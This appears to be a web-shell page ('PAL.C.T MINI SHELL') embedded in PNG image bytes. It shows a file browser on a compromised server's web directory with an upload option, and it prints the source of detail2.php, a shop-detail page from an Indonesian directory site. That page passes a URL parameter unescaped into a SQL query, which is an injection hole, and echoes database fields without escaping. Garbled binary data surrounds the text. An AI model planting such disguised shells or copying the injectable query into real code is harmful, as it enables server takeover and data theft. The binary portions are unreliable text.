php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/fbc/
upload
files >> /var/www/html/fbc/detail2.php

<?php 
include "koneksi.php"; ?>
<!DOCTYPE html>
<html>
	<head>
		<title>Faedah Teknik</title>
		<!--meta-->
		<meta charset="UTF-8" />
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">

		<!--style-->
		<!-- Bootstrap core CSS -->
	    <link href="<?php echo $base_url; ?>/asset/css/bootstrap.css" rel="stylesheet">
	    <link href="<?php echo $base_url; ?>/asset/css/slider.css" rel="stylesheet">
		<!--<link href="asset/css/flat-btn.css" rel="stylesheet"> -->
	    <link href="<?php echo $base_url; ?>/asset/css/style.css" rel="stylesheet">
		<link rel="stylesheet" type="text/css" href="<?php echo $base_url; ?>/asset/style/fancybox/jquery.fancybox.css" />
		<link rel="stylesheet" type="text/css" href="<?php echo $base_url; ?>/asset/style/jquery-ui-1.9.2.custom.css" />
		<link rel="stylesheet" type="text/css" href="<?php echo $base_url; ?>/asset/style/slide.css" />
		<link rel="stylesheet" type="text/css" href="<?php echo $base_url; ?>/asset/style/responsive.css" />


		<script src="https://use.fontawesome.com/a122d960f4.js"></script>

    	<script src="<?php echo $base_url; ?>/asset/js/jquery.js"></script>

<script type="text/javascript" src="<?php echo $base_url; ?>/asset/pop/jquery.fancybox.js"></script>
<link rel="stylesheet" type="text/css" href="<?php echo $base_url; ?>/asset/pop/jquery.fancybox.css" media="screen" />
<link rel="stylesheet" type="text/css" href="<?php echo $base_url; ?>/asset/pop/jquery.fancybox-buttons.css" />
<script type="text/javascript" src="<?php echo $base_url; ?>/asset/pop/jquery.fancybox-buttons.js"></script>
    
<script type="text/javascript">
    $(document).ready(function() {
      
      $('.fancybox').fancybox();
      $('.rot').fancybox({
          'width': 600,
          'autoSize': false
      });

      
      $('.fancybox-buttons').fancybox({
        openEffect  : 'none',
        closeEffect : 'none',

        prevEffect : 'none',
        nextEffect : 'none',

        closeBtn  : false,

        helpers : {
          title : {
            type : 'inside'
          },
          buttons : {}
        }
        
      });

    });
  </script>
  <style type="text/css">
    .fancybox-custom .fancybox-skin {
      box-shadow: 0 0 50px #222;
    }

    
  </style>
		


    <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="asset/js/html5shiv.js"></script>
      <script src="asset/js/respond.min.js"></script>
    <![endif]-->

	</head>
<body style="background: #fff">

<style type="text/css">
	.portfolio-item {
		/*box-shadow: 1px 1px 5px rgba(0,0,0,0.5);*/
		border:1px solid #e0e0e0;
		position: relative;
		display:none;
		overflow: hidden;
		padding: 0;
	}
	.portfolio-item .portfolio-image {
		position: relative;
		display: block;
		overflow: hidden;
	}
	.portfolio-item:hover img {
		-webkit-transform: scale(1.1,1.1);
		-moz-transform: scale(1.1,1.1);
		-ms-transform: scale(1.1,1.1);
		-o-transform: scale(1.1,1.1);
		transform: scale(1.1,1.1);
	}
	.portfolio-item:hover {
		box-shadow: 0 0 4px 1px rgba(204,204,204,.48);
	}
	    
	.portfolio-item .portfolio-image img {
		width: 100%;
		height: auto;
		-webkit-transition: all 0.2s linear;
		-moz-transition: all 0.2s linear;
		-o-transition: all 0.2s linear;
		transition: all 0.2s linear;
	}
	
	#gl{
	  padding: 7px;
	  padding-bottom: 12px;
	}
	#gl h3{
	  margin: 5px 0;
	  color:#222;
	  font-size: 16px;
	}
	#gl span{
	  color: #888;
	}
	#gl h5{
	  margin: 0;
	  padding: 0;
	  color:#ff5722;
	}
	#gl p{
		padding: 0;
	}
	#bn{
		background: #68B6E6;
		padding: 30px;
	}
</style>



<div class="container" style="padding-top: 15px">

	
	
	<div class='row'>
		
		<div class='col-md-12 main-contain'>
			
			

			<div class="row" style="margin-bottom: 0px">
			
				<?php 
					$qt = mysql_query("SELECT * FROM fbc_jaringan WHERE id_db='".$_GET['id']."'");
					while($rt = mysql_fetch_assoc($qt)){
						$ph = substr($rt['phone'], 1);
			        	$ph = str_replace(' ', '', $ph);
						$ph = "+62".$ph;

						$wa = substr($rt['whatsapp'], 1);
						$wa = str_replace(' ', '', $wa);
						$wa = "62".$wa;
				?>
				
                <div class="col-sm-12">
                	<span style="color:#888; font-size: 18px;">Detail Toko</span><br>
                	<div class="row">
                	<?php if($rt['foto'] != ""){ ?><div class="col-sm-6"><img src="<?php echo $base_url; ?>/fl/images/img_jaringan/<?php echo $rt['foto']; ?>" style="max-width: 350px; width: 100%; margin-bottom: 15px;"></div>
                		<?php }
                		?>
                		<div class="col-sm-6">
			                     <h3 style="margin-top: 5px"><?php echo $rt['nama_toko']; ?></h3>
			                     <h5 style="font-size: 15px;">
								<?php echo $rt['alamat1']; ?><br>
								<?php echo $rt['alamat2']; ?><br>
								Ph. <?php echo $rt['phone']; ?><br>
							</h5>
						
							<style type="text/css">
								.fa{
									font-size: 30px;
									color:#014EA2;
									margin: 0 5px;
								}
							</style>
			                <a href="tel:<?php echo $ph; ?>" target="_blank"><i class="fa fa-phone-square"></i></a>
							<a href="https://api.whatsapp.com/send?phone=<?php echo $wa; ?>" target="_blank"><i class="fa fa-whatsapp"></i></a>
							<a href="http://maps.google.com/maps?q=<?php echo $rt['gps']; ?>" target="_blank"><i class="fa fa-map-o"></i></a>     </div>
                  	</div>
                    
                </div>  
                <?php }
                 ?>

			</div>
		</div>
	</div>
	
</div>
<br><br>

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    	<script src="<?php echo $base_url; ?>/asset/js/bootstrap.min.js"></script>
    	<script src="<?php echo $base_url; ?>/asset/js/holder.js"></script>
    	<script src="<?php echo $base_url; ?>/asset/js/script.js"></script>
		<script type="text/javascript" src="<?php echo $base_url; ?>/asset/js/jquery.fancybox-1.3.4.pack.js"></script>
		<script type="text/javascript">

		$(document).ready(function(){
			jQuery('ul.nav li.dropdown').hover(function() {
			  jQuery(this).find('.dropdown-menu').stop(true, true).delay(100).fadeIn();
			}, function() {
			  jQuery(this).find('.dropdown-menu').stop(true, true).delay(100).fadeOut();
			});	

		});
		</script>
	
</body>
</html>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`